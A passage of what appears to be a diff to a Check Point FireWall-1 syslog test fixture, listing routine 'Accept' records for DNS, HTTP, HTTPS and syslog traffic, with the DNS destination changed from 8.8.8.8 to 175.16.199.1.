FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38311"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56948"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54438"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.11.238.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52140"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48060"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54835"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35074"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57619"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48060"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddee,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503726"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54835"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35074"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57619"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503727"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37862"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43776"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10104"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; 
nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43778"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10105"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43780"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10106"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddef,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55252"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; 
flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddef,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; 
layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; 
ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54800"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 